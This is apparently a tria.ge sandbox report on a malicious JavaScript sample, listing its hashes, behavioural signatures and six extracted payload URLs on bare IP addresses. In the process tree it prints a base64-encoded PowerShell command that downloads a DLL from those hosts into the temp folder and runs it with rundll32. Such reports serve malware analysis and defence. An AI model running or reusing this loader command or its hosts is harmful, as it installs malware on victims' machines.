Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
30s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
16/03/2023, 07:52
Static task
static1
Behavioral task
behavioral1
Sample
gM.dhnZAf.825544279.js
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
gM.dhnZAf.825544279.js
Resource
win10v2004-20230220-en
General
-
Target
gM.dhnZAf.825544279.js
-
Size
58KB
-
MD5
e957a7e0df257710146c2b6d3faeb0a0
-
SHA1
f60110c9b3dc63f515020981f11fd785b6478ea2
-
SHA256
93f4f64afab5b1a7f495e0a74118c86050be4eceaac92710b171be208ca6a3a1
-
SHA512
d0922498544d23e0ecd34fc4fbe5f081a3e7d041bfbe4d286e88e208b0c5b65bff516eeed38b531ad13d31e89d9a4829d1b8ecb046d19af34168ab4d04a46b2e
-
SSDEEP
768:0Pck7kN/4F7PIWCirMSrVuRfmmKnRO6IM+G1T0Rvob5AfdbtDx00knaxe1DVIPRm:r/QDPVJRXbxNAfR7hsIp8dSC
Malware Config
Extracted
http://198.44.132.63/azoznP2HTX1.dat
http://128.254.207.26/9CJqq.dat
http://139.180.170.206/Hm6BeG.dat
http://94.131.115.19/wNRI9qF0Tqgi.dat
http://87.236.146.84/hbWBN.dat
http://206.53.48.51/VqLRtB3ecLE.dat
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1980 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1980 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1052 wrote to memory of 1980 1052 wscript.exe 28 PID 1052 wrote to memory of 1980 1052 wscript.exe 28 PID 1052 wrote to memory of 1980 1052 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\gM.dhnZAf.825544279.js1⤵
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAZwBhAG0AZQBzAHQAZQByAHMAIAA9ACAAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADgALgA0ADQALgAxADMAMgAuADYAMwAvAGEAegBvAHoAbgBQADIASABUAFgAMQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAxADIAOAAuADIANQA0AC4AMgAwADcALgAyADYALwA5AEMASgBxAHEALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AMQAzADkALgAxADgAMAAuADEANwAwAC4AMgAwADYALwBIAG0ANgBCAGUARwAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA5ADQALgAxADMAMQAuADEAMQA1AC4AMQA5AC8AdwBOAFIASQA5AHEARgAwAFQAcQBnAGkALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AOAA3AC4AMgAzADYALgAxADQANgAuADgANAAvAGgAYgBXAEIATgAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAyADAANgAuADUAMwAuADQAOAAuADUAMQAvAFYAcQBMAFIAdABCADMAZQBjAEwARQAuAGQAYQB0ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAGIAcgBhAGMAaAB5AGMAZQBwAGgAYQBsAHkAIABpAG4AIAAkAGcAYQBtAGUAcwB0AGUAcgBzACkAIAB7AHQAcgB5ACAAewBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAGIAcgBhAGMAaAB5AGMAZQBwAGgAYQBsAHkAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADUAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAGEAcgBnAGUAbgB0AGkAZABlAC4AZABsAGwAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABlAG4AdgA6AFQARQBNAFAAXABhAHIAZwBlAG4AdABpAGQAZQAuAGQAbABsACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAGEAcgBnAGUAbgB0AGkAZABlAC4AZABsAGwALABYAFMAOAA4ADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7AH0AfQA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1980
-